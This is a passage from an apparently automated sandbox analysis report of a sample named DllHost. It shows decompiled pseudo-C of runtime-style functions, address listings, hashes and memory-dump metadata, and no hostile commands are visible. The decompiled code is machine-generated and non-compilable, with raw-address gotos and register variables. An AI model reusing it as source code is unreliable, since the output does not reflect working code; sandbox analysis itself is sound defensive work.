				_t50 =  &_v56; // -15
				_t51 = _t339 + 0x55; // 0x55
				r9d = 0x57;
				_v72 = _t51;
				E00007FF77FF7191EB788(0, 0, _t50, _t299, _t332, _t333);
				_t53 =  &_v56; // -15
				_t54 = _t339 + 0x56; // 0x56
				r9d = 0x52;
				_v72 = _t54;
				E00007FF77FF7191EB788(0, 0, _t53, _t299, _t332, _t333);
				_t56 =  &_v56; // -15
				_t57 = _t339 + 0x57; // 0x57
				r9d = 0x53;
				_v72 = _t57;
				E00007FF77FF7191EB788(0, 0, _t56, _t299, _t332, _t333);
				r9d = 0x15;
				_t59 =  &_v56; // -15
				_t60 = _t339 + 0x68; // 0x68
				_v72 = _t60;
				E00007FF77FF7191EB788(0, _t331 - 0x13, _t59, _t299, _t332, _t333);
				r9d = 0x14;
				_t63 =  &_v56; // -15
				_t64 = _t339 + 0x70; // 0x70
				_v72 = _t64;
				E00007FF77FF7191EB788(0, _t331 - 0x12, _t63, _t299, _t332, _t333);
				r9d = 0x16;
				_t67 =  &_v56; // -15
				_t68 = _t339 + 0x78; // 0x78
				_v72 = _t68;
				E00007FF77FF7191EB788(0, _t331 - 0x14, _t67, _t299, _t332, _t333);
				r9d = 0x17;
				_t71 =  &_v56; // -15
				_t72 = _t339 + 0x80; // 0x80
				_v72 = _t72;
				E00007FF77FF7191EB788(0, _t331 - 0x15, _t71, _t299, _t332, _t333);
				r9d = 0x50;
				_t75 =  &_v56; // -15
				_t76 = _t339 + 0x88; // 0x88
				_v72 = _t76;
				E00007FF77FF7191EB788(0, _t331 - 0x4e, _t75, _t299, _t332, _t333);
				_t79 = _t339 + 0x90; // 0x90
				_t241 = _t79;
				r9d = 0x51;
				_v72 = _t241;
				_t81 =  &_v56; // -15
				E00007FF77FF7191EB788(0, _t331 - 0x4f, _t81, _t299, _t332, _t333);
				if (_t212 == 0) goto 0x191ef975;
				E00007FF77FF7191EF4B8(_t339);
				E00007FF77FF7191E6B28(_t241, _t339);
				E00007FF77FF7191E6B28(_t241, _t335);
				E00007FF77FF7191E6B28(_t241, _t341);
				goto 0x191efad9;
				_t296 =  *_t337;
				if ( *_t296 == 0) goto 0x191efa28;
				_t83 = _t241 - 0x30; // -48
				_t181 = _t83;
				if (_t181 - 9 > 0) goto 0x191ef9a1;
				 *_t296 = _t181;
				r13d = 1;
				_t297 = _t296 + _t337;
				_t151 =  *_t297;
				if (_t151 != 0) goto 0x191ef983;
				goto 0x191efa2e;
				if (_t151 != 0x3b) goto 0x191ef98d;
				_t329 = _t297;
				_t182 =  *((intOrPtr*)(_t329 + 1));
				 *_t329 = _t182;
				if (_t182 != 0) goto 0x191ef9a8;
				r13d = 1;
				goto 0x191ef996;
				asm("movups xmm0, [eax]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x10]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x20]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x30]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x40]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x50]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x60]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x70]");
				asm("inc ecx");
				asm("movups xmm1, [eax+edx]");
				asm("inc ecx");
				 *((long long*)(_t339 + _t297 + 0x10)) =  *((intOrPtr*)(0x192191f0 + _t297 + 0x10));
				goto 0x191efa2e;
				r13d = 1;
				 *_t339 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8))));
				 *((long long*)(_t339 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 8));
				 *((long long*)(_t339 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x10));
				 *((long long*)(_t339 + 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x58));
				 *((long long*)(_t339 + 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x60));
				 *_t335 = r13d;
				if (_t341 == 0) goto 0x191efa83;
				 *_t341 = r13d;
				if ( *((intOrPtr*)(__rcx + 0xf0)) == 0) goto 0x191efa92;
				asm("lock dec dword [eax]");
				if ( *((intOrPtr*)(__rcx + 0xe0)) == 0) goto 0x191efac2;
				asm("lock xadd [ecx], eax");
				if ((_t151 | 0xffffffff) != 1) goto 0x191efac2;
				E00007FF77FF7191E6B28( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xf8)));
				E00007FF77FF7191E6B28( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xe0)));
				 *((long long*)(__rcx + 0xf0)) = _t341;
				 *((long long*)(__rcx + 0xe0)) = _t335;
				 *((long long*)(__rcx + 0xf8)) = _t339;
				return 0;
			}

























                                                                                                                                                              0x7ff7191ef5c4
                                                                                                                                                              0x7ff7191ef5c4
                                                                                                                                                              0x7ff7191ef5c4
                                                                                                                                                              0x7ff7191ef5c4
                                                                                                                                                              0x7ff7191ef5c4
                                                                                                                                                              0x7ff7191ef5c9
                                                                                                                                                              0x7ff7191ef5ce
                                                                                                                                                              0x7ff7191ef5e3
                                                                                                                                                              0x7ff7191ef5e6
                                                                                                                                                              0x7ff7191ef5ea
                                                                                                                                                              0x7ff7191ef5f8
                                                                                                                                                              0x7ff7191ef601
                                                                                                                                                              0x7ff7191ef603
                                                                                                                                                              0x7ff7191ef60d
                                                                                                                                                              0x7ff7191ef612
                                                                                                                                                              0x7ff7191ef620
                                                                                                                                                              0x7ff7191ef627
                                                                                                                                                              0x7ff7191ef62a
                                                                                                                                                              0x7ff7191ef632
                                                                                                                                                              0x7ff7191ef637
                                                                                                                                                              0x7ff7191ef646
                                                                                                                                                              0x7ff7191ef64d
                                                                                                                                                              0x7ff7191ef650
                                                                                                                                                              0x7ff7191ef658
                                                                                                                                                              0x7ff7191ef65d
                                                                                                                                                              0x7ff7191ef662
                                                                                                                                                              0x7ff7191ef66b
                                                                                                                                                              0x7ff7191ef677
                                                                                                                                                              0x7ff7191ef67e
                                                                                                                                                              0x7ff7191ef681
                                                                                                                                                              0x7ff7191ef686
                                                                                                                                                              0x7ff7191ef689
                                                                                                                                                              0x7ff7191ef68e
                                                                                                                                                              0x7ff7191ef696
                                                                                                                                                              0x7ff7191ef698
                                                                                                                                                              0x7ff7191ef69f
                                                                                                                                                              0x7ff7191ef6a6
                                                                                                                                                              0x7ff7191ef6ab
                                                                                                                                                              0x7ff7191ef6b1
                                                                                                                                                              0x7ff7191ef6b8
                                                                                                                                                              0x7ff7191ef6bd
                                                                                                                                                              0x7ff7191ef6c1
                                                                                                                                                              0x7ff7191ef6c7
                                                                                                                                                              0x7ff7191ef6cf
                                                                                                                                                              0x7ff7191ef6d8
                                                                                                                                                              0x7ff7191ef6dd
                                                                                                                                                              0x7ff7191ef6e1
                                                                                                                                                              0x7ff7191ef6e7
                                                                                                                                                              0x7ff7191ef6ef
                                                                                                                                                              0x7ff7191ef6f8
                                                                                                                                                              0x7ff7191ef6ff
                                                                                                                                                              0x7ff7191ef703
                                                                                                                                                              0x7ff7191ef707
                                                                                                                                                              0x7ff7191ef710
                                                                                                                                                              0x7ff7191ef718
                                                                                                                                                              0x7ff7191ef71d
                                                                                                                                                              0x7ff7191ef723
                                                                                                                                                              0x7ff7191ef723
                                                                                                                                                              0x7ff7191ef72a
                                                                                                                                                              0x7ff7191ef72f
                                                                                                                                                              0x7ff7191ef739
                                                                                                                                                              0x7ff7191ef73e
                                                                                                                                                              0x7ff7191ef744
                                                                                                                                                              0x7ff7191ef74d
                                                                                                                                                              0x7ff7191ef751
                                                                                                                                                              0x7ff7191ef75a
                                                                                                                                                              0x7ff7191ef75f
                                                                                                                                                              0x7ff7191ef765
                                                                                                                                                              0x7ff7191ef76e
                                                                                                                                                              0x7ff7191ef772
                                                                                                                                                              0x7ff7191ef77b
                                                                                                                                                              0x7ff7191ef782
                                                                                                                                                              0x7ff7191ef786
                                                                                                                                                              0x7ff7191ef78a
                                                                                                                                                              0x7ff7191ef793
                                                                                                                                                              0x7ff7191ef79a
                                                                                                                                                              0x7ff7191ef7a1
                                                                                                                                                              0x7ff7191ef7a5
                                                                                                                                                              0x7ff7191ef7a9
                                                                                                                                                              0x7ff7191ef7b2
                                                                                                                                                              0x7ff7191ef7b9
                                                                                                                                                              0x7ff7191ef7c0
                                                                                                                                                              0x7ff7191ef7c4
                                                                                                                                                              0x7ff7191ef7c8
                                                                                                                                                              0x7ff7191ef7d1
                                                                                                                                                              0x7ff7191ef7d8
                                                                                                                                                              0x7ff7191ef7df
                                                                                                                                                              0x7ff7191ef7e3
                                                                                                                                                              0x7ff7191ef7ec
                                                                                                                                                              0x7ff7191ef7f3
                                                                                                                                                              0x7ff7191ef7f7
                                                                                                                                                              0x7ff7191ef7fe
                                                                                                                                                              0x7ff7191ef802
                                                                                                                                                              0x7ff7191ef806
                                                                                                                                                              0x7ff7191ef80f
                                                                                                                                                              0x7ff7191ef816
                                                                                                                                                              0x7ff7191ef81d
                                                                                                                                                              0x7ff7191ef821
                                                                                                                                                              0x7ff7191ef825
                                                                                                                                                              0x7ff7191ef82e
                                                                                                                                                              0x7ff7191ef835
                                                                                                                                                              0x7ff7191ef83c
                                                                                                                                                              0x7ff7191ef840
                                                                                                                                                              0x7ff7191ef844
                                                                                                                                                              0x7ff7191ef84d
                                                                                                                                                              0x7ff7191ef854
                                                                                                                                                              0x7ff7191ef85b
                                                                                                                                                              0x7ff7191ef85f
                                                                                                                                                              0x7ff7191ef863
                                                                                                                                                              0x7ff7191ef86c
                                                                                                                                                              0x7ff7191ef873
                                                                                                                                                              0x7ff7191ef878
                                                                                                                                                              0x7ff7191ef87e
                                                                                                                                                              0x7ff7191ef887
                                                                                                                                                              0x7ff7191ef88b
                                                                                                                                                              0x7ff7191ef894
                                                                                                                                                              0x7ff7191ef899
                                                                                                                                                              0x7ff7191ef89f
                                                                                                                                                              0x7ff7191ef8a8
                                                                                                                                                              0x7ff7191ef8ac
                                                                                                                                                              0x7ff7191ef8b5
                                                                                                                                                              0x7ff7191ef8ba
                                                                                                                                                              0x7ff7191ef8c0
                                                                                                                                                              0x7ff7191ef8c9
                                                                                                                                                              0x7ff7191ef8cd
                                                                                                                                                              0x7ff7191ef8d6
                                                                                                                                                              0x7ff7191ef8db
                                                                                                                                                              0x7ff7191ef8e1
                                                                                                                                                              0x7ff7191ef8ea
                                                                                                                                                              0x7ff7191ef8f1
                                                                                                                                                              0x7ff7191ef8fa
                                                                                                                                                              0x7ff7191ef8ff
                                                                                                                                                              0x7ff7191ef905
                                                                                                                                                              0x7ff7191ef90e
                                                                                                                                                              0x7ff7191ef915
                                                                                                                                                              0x7ff7191ef91e
                                                                                                                                                              0x7ff7191ef925
                                                                                                                                                              0x7ff7191ef925
                                                                                                                                                              0x7ff7191ef92c
                                                                                                                                                              0x7ff7191ef932
                                                                                                                                                              0x7ff7191ef93a
                                                                                                                                                              0x7ff7191ef942
                                                                                                                                                              0x7ff7191ef949
                                                                                                                                                              0x7ff7191ef94e
                                                                                                                                                              0x7ff7191ef956
                                                                                                                                                              0x7ff7191ef95e
                                                                                                                                                              0x7ff7191ef966
                                                                                                                                                              0x7ff7191ef970
                                                                                                                                                              0x7ff7191ef975
                                                                                                                                                              0x7ff7191ef97d
                                                                                                                                                              0x7ff7191ef983
                                                                                                                                                              0x7ff7191ef983
                                                                                                                                                              0x7ff7191ef989
                                                                                                                                                              0x7ff7191ef98b
                                                                                                                                                              0x7ff7191ef98d
                                                                                                                                                              0x7ff7191ef993
                                                                                                                                                              0x7ff7191ef996
                                                                                                                                                              0x7ff7191ef99a
                                                                                                                                                              0x7ff7191ef99c
                                                                                                                                                              0x7ff7191ef9a3
                                                                                                                                                              0x7ff7191ef9a5
                                                                                                                                                              0x7ff7191ef9ac
                                                                                                                                                              0x7ff7191ef9ae
                                                                                                                                                              0x7ff7191ef9b6
                                                                                                                                                              0x7ff7191ef9b8
                                                                                                                                                              0x7ff7191ef9be
                                                                                                                                                              0x7ff7191ef9cc
                                                                                                                                                              0x7ff7191ef9cf
                                                                                                                                                              0x7ff7191ef9d3
                                                                                                                                                              0x7ff7191ef9d7
                                                                                                                                                              0x7ff7191ef9dc
                                                                                                                                                              0x7ff7191ef9e0
                                                                                                                                                              0x7ff7191ef9e5
                                                                                                                                                              0x7ff7191ef9e9
                                                                                                                                                              0x7ff7191ef9ee
                                                                                                                                                              0x7ff7191ef9f2
                                                                                                                                                              0x7ff7191ef9f7
                                                                                                                                                              0x7ff7191ef9fb
                                                                                                                                                              0x7ff7191efa00
                                                                                                                                                              0x7ff7191efa04
                                                                                                                                                              0x7ff7191efa09
                                                                                                                                                              0x7ff7191efa0d
                                                                                                                                                              0x7ff7191efa13
                                                                                                                                                              0x7ff7191efa17
                                                                                                                                                              0x7ff7191efa21
                                                                                                                                                              0x7ff7191efa26
                                                                                                                                                              0x7ff7191efa28
                                                                                                                                                              0x7ff7191efa38
                                                                                                                                                              0x7ff7191efa46
                                                                                                                                                              0x7ff7191efa55
                                                                                                                                                              0x7ff7191efa64
                                                                                                                                                              0x7ff7191efa73
                                                                                                                                                              0x7ff7191efa77
                                                                                                                                                              0x7ff7191efa7e
                                                                                                                                                              0x7ff7191efa80
                                                                                                                                                              0x7ff7191efa8d
                                                                                                                                                              0x7ff7191efa8f
                                                                                                                                                              0x7ff7191efa9c
                                                                                                                                                              0x7ff7191efaa1
                                                                                                                                                              0x7ff7191efaa8
                                                                                                                                                              0x7ff7191efab1
                                                                                                                                                              0x7ff7191efabd
                                                                                                                                                              0x7ff7191efac2
                                                                                                                                                              0x7ff7191efacb
                                                                                                                                                              0x7ff7191efad2
                                                                                                                                                              0x7ff7191efaf6

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 97d57e0011df2fbf41d18f85a203ae44eee132732a5ff23b5a1937e15f72d6fc
                                                                                                                                                              • Instruction ID: 0c7f00a616d57b933243bbd0c7aec9752b72ddf7bf8113445703c56feb98f2d5
                                                                                                                                                              • Opcode Fuzzy Hash: 97d57e0011df2fbf41d18f85a203ae44eee132732a5ff23b5a1937e15f72d6fc
                                                                                                                                                              • Instruction Fuzzy Hash: C2E17036A04F8186F711DB61E4406EDB7B4F798798F814631DE9D63792EF38D28A9310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F3980 Relevance: 1.7, APIs: 1, Instructions: 195COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00007FF77FF7191F3980(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, char* __r9) {
				signed int _t48;
				signed int _t52;
				signed char _t53;
				void* _t54;
				void* _t60;
				void* _t63;
				signed int _t87;
				signed int _t88;
				void* _t97;
				void* _t125;
				intOrPtr* _t133;
				void* _t138;
				long long _t149;
				void* _t152;
				void* _t153;
				void* _t158;
				void* _t159;
				void* _t162;

				_t135 = __rbx;
				_t158 = _t152;
				 *((long long*)(_t158 + 0x10)) = __rbx;
				 *((long long*)(_t158 + 0x18)) = _t149;
				 *((long long*)(_t158 + 0x20)) = __rsi;
				_t153 = _t152 - 0x30;
				 *__r9 = 0;
				r10d = r10d & 0x0000003f;
				_t87 = r8d;
				_t133 =  *((intOrPtr*)(0x1921b700 + (__ecx >> 6) * 8));
				if ( *((intOrPtr*)(_t133 + 0x38 + (__ecx + __ecx * 8) * 8)) >= 0) goto 0x191f3be1;
				r15d = 0x74000;
				if ((r15d & r8d) != 0) goto 0x191f39fe;
				_t138 = _t158 + 8;
				 *(_t153 + 0x50) = 0;
				_t97 = E00007FF77FF7191E2B1C(_t133, _t138);
				if (_t97 != 0) goto 0x191f3bfc;
				if (_t97 != 0) goto 0x191f3a39;
				asm("bts edi, 0xe");
				r15d = 2;
				if ((_t87 & r15d) == 0x4000) goto 0x191f3a4f;
				_t16 = _t138 - 0x10000; // 0x64000
				if ((0xffffbfff & _t16) == 0) goto 0x191f3a3d;
				_t19 = _t138 - 0x20000; // 0x54000
				if ((0xffffbfff & _t19) == 0) goto 0x191f3a4a;
				_t22 = _t138 - 0x40000; // 0x34000
				_t48 = _t22;
				if ((0xffffbfff & _t48) != 0) goto 0x191f3a51;
				 *__r9 = 1;
				goto 0x191f3a51;
				_t88 = _t87 | _t48;
				goto 0x191f39fe;
				if ((_t88 & 0x00000301) != 0x301) goto 0x191f3a51;
				 *((intOrPtr*)(__r9)) = r15b;
				goto 0x191f3a51;
				 *__r9 = 0;
				if ((_t88 & 0x00070000) == 0) goto 0x191f3be1;
				if (( *__rdx & 0x00000040) != 0) goto 0x191f3be1;
				_t52 = __rdx[4] & 0xc0000000;
				if (_t52 == 0x40000000) goto 0x191f3a8b;
				if (_t52 == 0x80000000) goto 0x191f3ab6;
				if (_t52 != 0xc0000000) goto 0x191f3be1;
				_t53 = __rdx[8];
				if (_t53 == 0) goto 0x191f3be1;
				if (_t53 - r15d <= 0) goto 0x191f3aa9;
				if (_t53 - 4 <= 0) goto 0x191f3afc;
				if (_t53 != 5) goto 0x191f3be1;
				if (0 == 0) goto 0x191f3b84;
				r8d = 3;
				 *(_t153 + 0x50) = 0;
				_t54 = E00007FF77FF7191E8A0C(0, r14d, _t133, __rbx, _t153 + 0x50, __r9, _t162, _t159);
				if (_t54 <= 0) goto 0x191f3ad7;
				_t91 =  ==  ? 0 : 1;
				if (_t54 == 0xffffffff) goto 0x191f3b21;
				if (_t54 == r15d) goto 0x191f3b38;
				if (_t54 != 3) goto 0x191f3b71;
				if ( *(_t153 + 0x50) != 0xbfbbef) goto 0x191f3b38;
				 *__r9 = 1;
				goto 0x191f3b84;
				r8d = r15d;
				E00007FF77FF7191E8FF8(_t138, _t153 + 0x50);
				if (_t133 == 0) goto 0x191f3b88;
				r8d = 0;
				E00007FF77FF7191E8FF8(_t138, _t153 + 0x50);
				if (_t133 != 0xffffffff) goto 0x191f3b2d;
				E00007FF77FF7191DC854(_t133);
				goto 0x191f3be3;
				goto 0x191f3aae;
				if (( *(_t153 + 0x50) & 0x0000ffff) != 0xfffe) goto 0x191f3b51;
				_t60 = E00007FF77FF7191DC854(_t133);
				 *_t133 = 0x16;
				goto 0x191f3b21;
				if (_t60 != 0xfeff) goto 0x191f3b71;
				r8d = 0;
				E00007FF77FF7191E8FF8(_t138, _t162);
				if (_t133 == 0xffffffff) goto 0x191f3b21;
				 *((intOrPtr*)(__r9)) = r15b;
				goto 0x191f3b84;
				r8d = 0;
				E00007FF77FF7191E8FF8(_t138, _t162);
				if (_t133 == 0xffffffff) goto 0x191f3b21;
				_t125 =  ==  ? 0 : 1;
				if (_t125 == 0) goto 0x191f3be1;
				 *(_t153 + 0x50) = 0;
				if (_t125 == 0) goto 0x191f3ba8;
				if ( *__r9 - 1 != 1) goto 0x191f3bb5;
				 *(_t153 + 0x50) = 0xfeff;
				goto 0x191f3bb9;
				 *(_t153 + 0x50) = 0xbfbbef;
				if (3 == 0) goto 0x191f3be1;
				r8d = 3;
				r8d = r8d;
				_t63 = E00007FF77FF7191E6760(0, r14d, 3, 0, _t135, _t153 + 0x50, __r9);
				if (_t63 == 0xffffffff) goto 0x191f3b21;
				if (3 - 0 + _t63 > 0) goto 0x191f3bb9;
				return 0;
			}





















                                                                                                                                                              0x7ff7191f3980
                                                                                                                                                              0x7ff7191f3980
                                                                                                                                                              0x7ff7191f3983
                                                                                                                                                              0x7ff7191f3987
                                                                                                                                                              0x7ff7191f398b
                                                                                                                                                              0x7ff7191f3994
                                                                                                                                                              0x7ff7191f39a0
                                                                                                                                                              0x7ff7191f39a3
                                                                                                                                                              0x7ff7191f39b8
                                                                                                                                                              0x7ff7191f39c2
                                                                                                                                                              0x7ff7191f39cb
                                                                                                                                                              0x7ff7191f39d1
                                                                                                                                                              0x7ff7191f39da
                                                                                                                                                              0x7ff7191f39dc
                                                                                                                                                              0x7ff7191f39e0
                                                                                                                                                              0x7ff7191f39e9
                                                                                                                                                              0x7ff7191f39eb
                                                                                                                                                              0x7ff7191f39f8
                                                                                                                                                              0x7ff7191f39fa
                                                                                                                                                              0x7ff7191f3a03
                                                                                                                                                              0x7ff7191f3a0f
                                                                                                                                                              0x7ff7191f3a11
                                                                                                                                                              0x7ff7191f3a1e
                                                                                                                                                              0x7ff7191f3a20
                                                                                                                                                              0x7ff7191f3a28
                                                                                                                                                              0x7ff7191f3a2a
                                                                                                                                                              0x7ff7191f3a2a
                                                                                                                                                              0x7ff7191f3a32
                                                                                                                                                              0x7ff7191f3a34
                                                                                                                                                              0x7ff7191f3a37
                                                                                                                                                              0x7ff7191f3a39
                                                                                                                                                              0x7ff7191f3a3b
                                                                                                                                                              0x7ff7191f3a48
                                                                                                                                                              0x7ff7191f3a4a
                                                                                                                                                              0x7ff7191f3a4d
                                                                                                                                                              0x7ff7191f3a4f
                                                                                                                                                              0x7ff7191f3a57
                                                                                                                                                              0x7ff7191f3a61
                                                                                                                                                              0x7ff7191f3a6f
                                                                                                                                                              0x7ff7191f3a7a
                                                                                                                                                              0x7ff7191f3a81
                                                                                                                                                              0x7ff7191f3a85
                                                                                                                                                              0x7ff7191f3a8b
                                                                                                                                                              0x7ff7191f3a90
                                                                                                                                                              0x7ff7191f3a99
                                                                                                                                                              0x7ff7191f3a9e
                                                                                                                                                              0x7ff7191f3aa3
                                                                                                                                                              0x7ff7191f3ab0
                                                                                                                                                              0x7ff7191f3ab6
                                                                                                                                                              0x7ff7191f3abc
                                                                                                                                                              0x7ff7191f3ac8
                                                                                                                                                              0x7ff7191f3acf
                                                                                                                                                              0x7ff7191f3ad4
                                                                                                                                                              0x7ff7191f3ada
                                                                                                                                                              0x7ff7191f3adf
                                                                                                                                                              0x7ff7191f3ae4
                                                                                                                                                              0x7ff7191f3af2
                                                                                                                                                              0x7ff7191f3af4
                                                                                                                                                              0x7ff7191f3af7
                                                                                                                                                              0x7ff7191f3afc
                                                                                                                                                              0x7ff7191f3b04
                                                                                                                                                              0x7ff7191f3b0c
                                                                                                                                                              0x7ff7191f3b0e
                                                                                                                                                              0x7ff7191f3b16
                                                                                                                                                              0x7ff7191f3b1f
                                                                                                                                                              0x7ff7191f3b21
                                                                                                                                                              0x7ff7191f3b28
                                                                                                                                                              0x7ff7191f3b33
                                                                                                                                                              0x7ff7191f3b42
                                                                                                                                                              0x7ff7191f3b44
                                                                                                                                                              0x7ff7191f3b49
                                                                                                                                                              0x7ff7191f3b4f
                                                                                                                                                              0x7ff7191f3b56
                                                                                                                                                              0x7ff7191f3b58
                                                                                                                                                              0x7ff7191f3b61
                                                                                                                                                              0x7ff7191f3b6a
                                                                                                                                                              0x7ff7191f3b6c
                                                                                                                                                              0x7ff7191f3b6f
                                                                                                                                                              0x7ff7191f3b71
                                                                                                                                                              0x7ff7191f3b79
                                                                                                                                                              0x7ff7191f3b82
                                                                                                                                                              0x7ff7191f3b84
                                                                                                                                                              0x7ff7191f3b86
                                                                                                                                                              0x7ff7191f3b8d
                                                                                                                                                              0x7ff7191f3b94
                                                                                                                                                              0x7ff7191f3b99
                                                                                                                                                              0x7ff7191f3b9b
                                                                                                                                                              0x7ff7191f3ba6
                                                                                                                                                              0x7ff7191f3ba8
                                                                                                                                                              0x7ff7191f3bb7
                                                                                                                                                              0x7ff7191f3bb9
                                                                                                                                                              0x7ff7191f3bc4
                                                                                                                                                              0x7ff7191f3bcd
                                                                                                                                                              0x7ff7191f3bd5
                                                                                                                                                              0x7ff7191f3bdf
                                                                                                                                                              0x7ff7191f3bfb

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 474895018-0
                                                                                                                                                              • Opcode ID: fde5bbda4939e109ffac8d7f7d1ba3794efc0f777374d062de8ef4af2bad3042
                                                                                                                                                              • Instruction ID: 882b0d26a09d185a94c0b25b2269e2d7912a941527f70820732473c1f6c3b61d
                                                                                                                                                              • Opcode Fuzzy Hash: fde5bbda4939e109ffac8d7f7d1ba3794efc0f777374d062de8ef4af2bad3042
                                                                                                                                                              • Instruction Fuzzy Hash: 02712032E0C98646F7656D29B450238E2A1AF403B8F940234EB1D876D5EE7DE4CFA720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EDC14 Relevance: 1.6, APIs: 1, Instructions: 146COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191EDC14(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x191edc42;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x191edc7e;
				return __rdx + 0xb;
			}






                                                                                                                                                              0x7ff7191edc14
                                                                                                                                                              0x7ff7191edc19
                                                                                                                                                              0x7ff7191edc1e
                                                                                                                                                              0x7ff7191edc42
                                                                                                                                                              0x7ff7191edc49
                                                                                                                                                              0x7ff7191edc5c
                                                                                                                                                              0x7ff7191edc7d

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dfefc60099e5e51bd56bb5f3f6db4a6d3649e9fec54228497bd79081abebb2d5
                                                                                                                                                              • Instruction ID: 423de175bd78d0d7ef70b54a114cde383a680ce95fc0d44f8c64ef027d754cb8
                                                                                                                                                              • Opcode Fuzzy Hash: dfefc60099e5e51bd56bb5f3f6db4a6d3649e9fec54228497bd79081abebb2d5
                                                                                                                                                              • Instruction Fuzzy Hash: EF51D326B08A9149F720EF76B9041ADBBB4AB50BE8F944134EE5C57A85CF3CD086D700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F1688 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E00007FF77FF7191F1688(void* __ecx, void* __edx, long long __rbx, long long __rcx, signed int __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v264;
				unsigned int _t22;
				signed int _t23;
				void* _t25;
				unsigned int _t33;
				intOrPtr _t38;
				signed long long _t53;
				signed long long _t54;
				long long _t56;
				unsigned int* _t67;
				signed long long _t69;
				void* _t71;

				_t64 = __rdx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t53 =  *0x192190a0; // 0x590452ce5669
				_t54 = _t53 ^ _t71 - 0x00000120;
				_v24 = _t54;
				_t56 = __rcx;
